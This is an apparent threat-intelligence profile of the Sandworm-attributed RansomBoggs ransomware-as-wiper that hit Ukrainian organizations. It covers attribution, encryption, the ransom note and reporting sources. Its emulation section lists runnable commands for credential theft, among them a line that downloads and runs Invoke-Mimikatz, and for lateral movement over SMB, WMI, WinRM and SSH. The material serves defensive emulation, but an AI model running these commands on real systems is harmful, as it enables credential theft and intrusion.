Home/Threat Actor/RansomBoggs
Threat Actor

RansomBoggs

ransomboggs · russia_apt_sandworm · active since 2022-11

RansomBoggs (canonical ESET naming per November 25, 2022 disclosure.

ESET detection signatures MSIL/Filecoder.Sullivan.A + MSIL/Filecoder.RansomBoggs.A; signature Monsters Inc. themed ransom note with James P. Sullivan persona) is a .NET (MSIL) ransomware-as-wiper deployed November 21, 2022 by Sandworm against multiple Ukrainian organizations (at least 5 per ESET spokeswoman Yulia Andrienko via The Record)

Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre-weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator) via ESET canonical POWERGAP PowerShell deployment- similarity attribution (per ESET: "There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller is almost identical to the one seen last April during the Industroyer2 attacks against the energy sector") + ESET APT Activity Report T3 2022 establishing Prestige + RansomBoggs as paired Sandworm ransomware-as-wiper operations late 2022.

standalone malware platform cluster paralleling prestige_ransomware + swiftslicer in 2023+ Sandworm destructive cyberweapon evolution cell.

operational attack architecture comprising POWERGAP PowerShell script deployment from AD domain controller (CERT-UA- named, cluster-defining cluster-cell coherence with v0.1.124 industroyer.yaml + v0.1.130 caddywiper.yaml, "almost identical" PowerShell script across April 2022 Industroyer2 + March 2022 CaddyWiper via ArguePatch loader + November 2022 RansomBoggs distribution) + cluster-defining AES-256 CBC encryption with random per-victim key (NOT AES-128 as ransom note misleadingly claims per ESET) + cluster-defining .chsch file extension on encrypted files + RSA-encrypted aes.bin key storage + variant flexibility with RSA public key hardcoded OR provided as argument per ESET analysis.

cluster- defining Monsters Inc. themed ransom note operator- trolling tradecraft (SullivanDecryptsYourFiles.txt filename + "Dear human life form!" salutation + "James P. Sullivan, an employee of Monsters, Inc." author persona referencing 2001 Pixar Monsters Inc. protagonist + Sullivan executable name + Monsters Inc. references throughout malware code + Telegram account named Sullivan + note text "We are relying on you in these hard times and are crying for help" per The Record)

signature destructive-operation- disguised-as-ransomware tradecraft echoing NotPetya 2017 + Prestige October 2022 lineage, per ESET APT Activity Report T3 2022: "Sandworm attacks using ransomware as a wiper... the final objective was the same as for the wipers: data destruction. Unlike traditional ransomware attacks, the Sandworm operators do not intend to provide a decryption key"; exclusively Ukraine-targeting per ESET telemetry (distinct from Prestige Ukraine + Poland targeting , operationally separate target scope)

.NET (MSIL) ransomware family distinct codebase from Prestige (C++) + SwiftSlicer (Go) demonstrating Sandworm multi-language destructive capability.

ESET January 27, 2023 SwiftSlicer disclosure retrospectively consolidated RansomBoggs + SwiftSlicer cluster-cell coherence ("Two months ago, ESET detected a wave of RansomBoggs ransomware attacks in the war-torn country that were also linked to Sandworm")

ESET DynoWiper January 30, 2026 retrospective catalogs RansomBoggs in chronological Sandworm destructive malware family (HermeticWiper + HermeticRansom + CaddyWiper + DoubleZero + ARGUEPATCH + ORCSHRED + SOLOSHRED + AWFULSHRED + Prestige ransomware + RansomBoggs ransomware + SDelete-based wipers + BidSwipe + ROARBAT + SwiftSlicer + NikoWiper + SharpNikoWiper + ZEROLOT + Sting wiper + ZOV wiper); cluster fills .NET ransomware-as-wiper position in 2023+ Sandworm destructive cyberweapon evolution cell.

canonical illustration of Monsters Inc.-themed operator-trolling ransom note tradecraft + POWERGAP PowerShell deployment continuity with Industroyer2 + CaddyWiper + Sandworm multi-language destructive capability development cited in essentially all subsequent Sandworm + Ukraine war + ransomware-as- wiper + .NET ransomware industry analyses through 2022-2026 period.

russia_apt_sandworm confidence: high 16 aliases
Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

Profile

RansomBoggs (canonical ESET naming per November 25, 2022 disclosure.

ESET detection signatures MSIL/Filecoder.Sullivan.A + MSIL/Filecoder.RansomBoggs.A; signature Monsters Inc. themed ransom note with James P. Sullivan persona) is a .NET (MSIL) ransomware- as-wiper deployed November 21, 2022 by Sandworm against multiple Ukrainian organizations. Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre- weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster) via ESET canonical POWERGAP PowerShell deployment-similarity attribution + ESET APT Activity Report T3 2022. Standalone malware platform cluster paralleling prestige_ransomware + swiftslicer in the 2023+ Sandworm destructive cyberweapon evolution cell.

Operational target profile
  • Multiple Ukrainian organizations (at least 5 per ESET spokeswoman Yulia Andrienko via The Record)
  • Ukrainian entities only, ESET did not detect RansomBoggs outside Ukraine.
  • No specific sector concentration disclosed Operational attack architecture: (1) POWERGAP PowerShell deployment (cluster- defining cluster-cell coherence): CERT-UA-named POWERGAP PowerShell script for RansomBoggs distribution from AD domain controller, script "almost identical" to one used in April 2022 Industroyer2 attacks against energy sector + March 2022 CaddyWiper attacks via ArguePatch loader. Operationally cluster-cell coherent with v0.1.124 industroyer.yaml + v0.1.130 caddywiper.yaml tradecraft. (2) AES-256 CBC encryption with random per-victim key (cluster-defining): NOT AES-128 as ransom note misleadingly claims. Per ESET: "RansomBoggs generates a random key and encrypts files using AES-256 in CBC mode (not AES-128 like mentioned in the ransom note), and appends the .chsch file extension." (3) .chsch file extension on encrypted files (cluster-defining): distinctive ransomware family signature (4) RSA-encrypted aes.bin key storage (signature): AES key RSA-encrypted + written to aes.bin file (5) Variant flexibility, RSA public key hardcoded OR provided as argument (signature): deployment flexibility per ESET analysis (6) Monsters Inc.
themed ransom note (cluster- defining operator-trolling signature)
  • SullivanDecryptsYourFiles.txt ransom note filename.
  • "Dear human life form!" salutation.
  • "James P. Sullivan, an employee of Monsters, Inc." author persona (2001 Pixar Monsters Inc. protagonist)
  • Sullivan executable name.
  • Monsters Inc. references throughout malware code.
  • Telegram account named Sullivan.
  • Note text: "We are relying on you in these hard times and are crying for help" (7) No decryption key intent (signature destructive operation): per ESET APT Activity Report T3 2022, Sandworm operators do not intend to provide decryption key, ransomware-as-wiper destructive operation pattern echoing NotPetya 2017 + Prestige October 2022 lineage.
Signature operational tradecraft
  • .NET (MSIL) ransomware family (signature): distinct codebase from Prestige (C++) + SwiftSlicer (Go) showing Sandworm multi-language destructive capability.
  • POWERGAP PowerShell deployment (cluster-defining cluster-cell coherence): identical script across Industroyer2 + CaddyWiper + RansomBoggs deployments.
  • Monsters Inc. themed ransom note (cluster-defining operator-trolling signature): distinct from typical criminal ransomware.
  • AES-256 CBC random per-victim key + .chsch extension (cluster-defining encryption signature).
  • AES-128 claim in ransom note vs AES-256 actual mode (signature): deliberate misleading or developer mistake.
  • Variant flexibility with hardcoded OR argument RSA key (signature): deployment flexibility.
  • Exclusively Ukraine-targeting (signature): distinct from Prestige Ukraine+Poland targeting.
  • Paired with Prestige October 2022 + cluster-cell coherence with SwiftSlicer January 2023: late-2022 Sandworm ransomware-as-wiper operations The cluster fills the .NET ransomware-as-wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell + canonical illustration of Monsters Inc.-themed operator-trolling tradecraft.

Aliases

16
ransomboggsransom boggsransomboggs_ransomwareransomboggs_malwaremsil filecoder sullivan amsil filecoder ransomboggs amsil_filecoder_sullivan_amsil_filecoder_ransomboggs_asullivanjames p sullivansullivandecryptsyourfilesransomboggs sandworm ukraine november 2022ransomboggs .net ransomware sandwormransomboggs monsters inc sullivan themeransomboggs aes 256 cbc chsch extensionransomboggs powergap deployment

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

9
2026ESET DynoWiper January 2026 Retrospective Catalog
2023Cluster-Cell Coherence with SwiftSlicer (January 2023)
2022-2026Continued Industry Reference Status (2022-2026)
2022RansomBoggs Initial Deployment + ESET Detection (November 21, 2022)
2022ESET Canonical Disclosure (November 25, 2022)
2022Monsters Inc. Themed Ransom Note Signature
2022ESET Confirmed At Least 5 Ukrainian Organizations Targeted
2022AES-256 CBC Encryption + .chsch Extension Signature
2022Paired with Prestige Ransomware October 2022 Sandworm Late-2022 Operations

Attribution & Reporting

Attributed by
ESET WeLiveSecurity (canonical November 25, 2022 disclosure + APT Activity Report T3 2022)ESET Research Twitter (@ESETresearch, real-time November 25, 2022 disclosure thread)ESET (Yulia Andrienko ESET spokeswoman, canonical industry communication via The Record)CERT-UA Ukrainian Computer Emergency Response Team (canonical incident response coordination, POWERGAP PowerShell script naming)Microsoft Threat Intelligence Center (IRIDIUM / Seashell Blizzard Sandworm canonical tracking)Mandiant / Google Cloud Threat Intelligence Group (APT44 Sandworm canonical tracking)CrowdStrike (Voodoo Bear canonical Sandworm tracking)The Record (Recorded Future News) (canonical Sandworm hacking group RansomBoggs reporting)The Register (canonical Monster ransomware attacks reporting)The Hacker News (canonical Russia-based RansomBoggs reporting)Bleeping Computer (canonical Ukraine ransomware linked to Sandworm reporting)Cyware Alerts (canonical RansomBoggs attribution analysis)SecurityAffairs (canonical RansomBoggs Ukrainian entities reporting)ExploitOne (canonical Monster ransomware attack reporting)IMI Ukraine (canonical Russian hacker group Sandworm reporting)US Department of Justice (October 15, 2020 indictment of 6 GRU Unit 74455 officers)MITRE ATT&CK + Malpedia industry consensus
Key reporting
reportESET WeLiveSecurity: RansomBoggs, New ransomware targeting Ukraine (November 28, 2022), canonical disclosure
reportESET Research Twitter (@ESETresearch): Real-time November 25, 2022 disclosure thread
reportESET (Yulia Andrienko ESET spokeswoman): canonical industry communication via The Record, at least 5 Ukrainian organizations confirmed
reportESET APT Activity Report T3 2022 (December 2022): Russian APT groups continue attacks against Ukraine with wipers and ransomware
reportESET DynoWiper January 2026 retrospective: RansomBoggs cataloged in Sandworm destructive malware family
reportCERT-UA Ukrainian Computer Emergency Response Team: canonical incident response coordination + POWERGAP PowerShell script naming
reportThe Record (Recorded Future News): Sandworm hacking group linked to new ransomware deployed in Ukraine
reportThe Register: Sandworm gang launches Monster ransomware attacks on Ukraine (November 29, 2022)
reportThe Hacker News: Russia-based RansomBoggs Ransomware Targeted Several Ukrainian Organizations (November 28, 2022)
reportBleeping Computer: New ransomware attacks in Ukraine linked to Russian Sandworm hackers (November 25, 2022)
reportCyware Alerts (Hacker News): RansomBoggs Attacks in Ukraine Linked To Russian Hackers
reportSecurityAffairs: RansomBoggs Ransomware hit several Ukrainian entities (November 28, 2022)
reportExploitOne: Monster ransomware attack against Ukrainian companies by the Sandworm group
reportIMI Ukraine: Russian hacker group Sandworm launches ransomware attacks on Ukraine
reportMicrosoft Threat Intelligence Center: IRIDIUM / Seashell Blizzard canonical Sandworm tracking (RansomBoggs adjacent attribution)
reportMandiant / Google Cloud Threat Intelligence Group: APT44 Sandworm canonical tracking
reportCrowdStrike: Voodoo Bear canonical Sandworm tracking
reportUS Department of Justice: October 15, 2020 indictment of 6 GRU Unit 74455 officers
reportMalpedia Software Profile: RansomBoggs

Operational

State sponsor

Russian state-sponsored APT, Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Microsoft IRIDIUM pre-weather / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster). Attribution chain: (1) ESET canonical November 25, 2022 disclosure: published "RansomBoggs: New ransomware targeting Ukraine" by ESET Research Team. Per ESET (via X formerly Twitter): "On November 21st ESETResearch detected and alerted CERT-UA of a wave of ransomware we named RansomBoggs, deployed in multiple organizations in Ukraine.

While the malware written in .NET is new, its deployment is similar to previous attacks attributed to Sandworm." (2) POWERGAP PowerShell deployment-similarity Sandworm attribution: per ESET: "There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller is almost identical to the one seen last April during the Industroyer2 attacks against the energy sector." The CERT-UA-named POWERGAP PowerShell script was used in March 2022 to deliver CaddyWiper via ArguePatch loader + April 2022 to deliver Industroyer2 + November 2022 to deliver RansomBoggs (cluster-cell coherence with v0.1.124 industroyer.yaml + v0.1.130 caddywiper.yaml). (3) ESET APT Activity Report T3 2022 Sandworm attribution: per ESET press release: "Russian APT groups attacked Ukraine with ransomware (Prestige, RansomBoggs)", establishing Prestige + RansomBoggs as paired ransomware-as-wiper Sandworm operations late 2022. (4) CERT-UA Ukrainian Computer Emergency Response Team canonical coordination: ESET alerted CERT-UA of RansomBoggs wave November 21, 2022.

CERT-UA coordinated incident response across affected Ukrainian organizations. (5) MITRE ATT&CK + industry consensus: RansomBoggs attributed to Sandworm (Unit 74455) per multi-vendor consensus (ESET primary + Microsoft IRIDIUM/Seashell Blizzard adjacent + Mandiant APT44 + CrowdStrike Voodoo Bear). Operational mission objective: Per ESET APT Activity Report T3 2022: ransomware-as- wiper destructive operation with no decryption key intent.

Per ESET: "Sandworm attacks using ransomware as a wiper. In those attacks, although ransomware was used, the final objective was the same as for the wipers: data destruction. Unlike traditional ransomware attacks, the Sandworm operators do not intend to provide a decryption key.

" Operational target profile
  • Multiple Ukrainian organizations (at least 5 per ESET via The Record's Yulia Andrienko)
  • Ukrainian entities only, ESET did not detect RansomBoggs outside Ukraine.
  • No specific sector concentration disclosed by ESET The cluster fills the .NET ransomware-as-wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell + Monsters Inc.-themed operator-trolling tradecraft signature.
Motivations
ukrainian_organization_destruction_via_ransomware_as_wiper_tradecraft, sandworm_continued_destructive_cyberweapon_capability_demonstration_late_2022, net_msil_ransomware_family_development_capability, monsters_inc_themed_ransom_note_operator_trolling_signature, cluster_cell_coherence_with_prestige_october_2022_ransomware_as_wiper_paired_operation, powergap_powershell_deployment_continuity_with_industroyer2_caddywiper_tradecraft, russian_strategic_objective_continued_ukrainian_disruption
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)55/60 · 91%
Analytics (MITRE CAR)32/60 · 53%
Runtime / container (Falco)6/60 · 10%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)17/60 · 28%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MONSTERS INC 2001 PIXAR MOVIE REFERENCES IN CODEMONSTERS INC THEMED RANSOM NOTE JAMES P SULLIVAN PERSONASANDWORM SEASHELL BLIZZARD IRIDIUM ATTRIBUTION CHAINSULLIVAN EXECUTABLE NAMESULLIVANDECRYPTSYOURFILES.TXT RANSOM NOTE FILENAME
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin